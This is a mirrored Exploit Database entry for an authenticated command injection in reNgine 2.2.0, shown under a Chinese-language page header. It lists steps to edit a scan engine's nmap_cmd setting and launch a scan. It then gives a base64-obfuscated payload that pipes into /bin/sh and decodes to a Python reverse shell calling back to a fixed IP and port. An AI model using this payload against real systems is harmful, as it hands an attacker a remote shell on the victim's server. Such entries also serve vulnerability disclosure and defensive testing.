reNgine 2.2.0 – Command Injection (Authenticated)

• Exploit Database
• 37 阅读

• 作者： Caner Tercan
  日期： 2024-10-01
• 类别：

  • webapps
  平台：

  • multiple
• 来源：https://www.exploit-db.com/exploits/52081/

• # Exploit Title: reNgine 2.2.0 - Command Injection (Authenticated)
  # Date: 2024-09-29
  # Exploit Author: Caner Tercan
  # Vendor Homepage: https://rengine.wiki/
  # Software Link: https://github.com/yogeshojha/rengine
  # Version: v2.2.0
  # Tested on: macOS
  
  POC : 
  
  1. Login the Rengine Platform
  2. Click the Scan Engine
  3. Modify any Scan Engine
  4. I modified nmap_cmd parameters on yml config
  5. Finally, add a target in the targets section, select the scan engine you edited and start scanning.
  
  payload :
  
  'nmap_cmd': 'echo "cHl0aG9uMyAtYyAnaW1wb3J0IHNvY2tldCxvcyxwdHk7cz1zb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVULHNvY2tldC5TT0NLX1NUUkVBTSk7cy5jb25uZWN0KCgiMTAuMjQ0LjE1MC42OSIsNjE2MTIpKTtvcy5kdXAyKHMuZmlsZW5vKCksMCk7b3MuZHVwMihzLmZpbGVubygpLDEpO29zLmR1cDIocy5maWxlbm8oKSwyKTtwdHkuc3Bhd24oIi9iaW4vc2giKScg"|base64 --decode |/bin/sh#’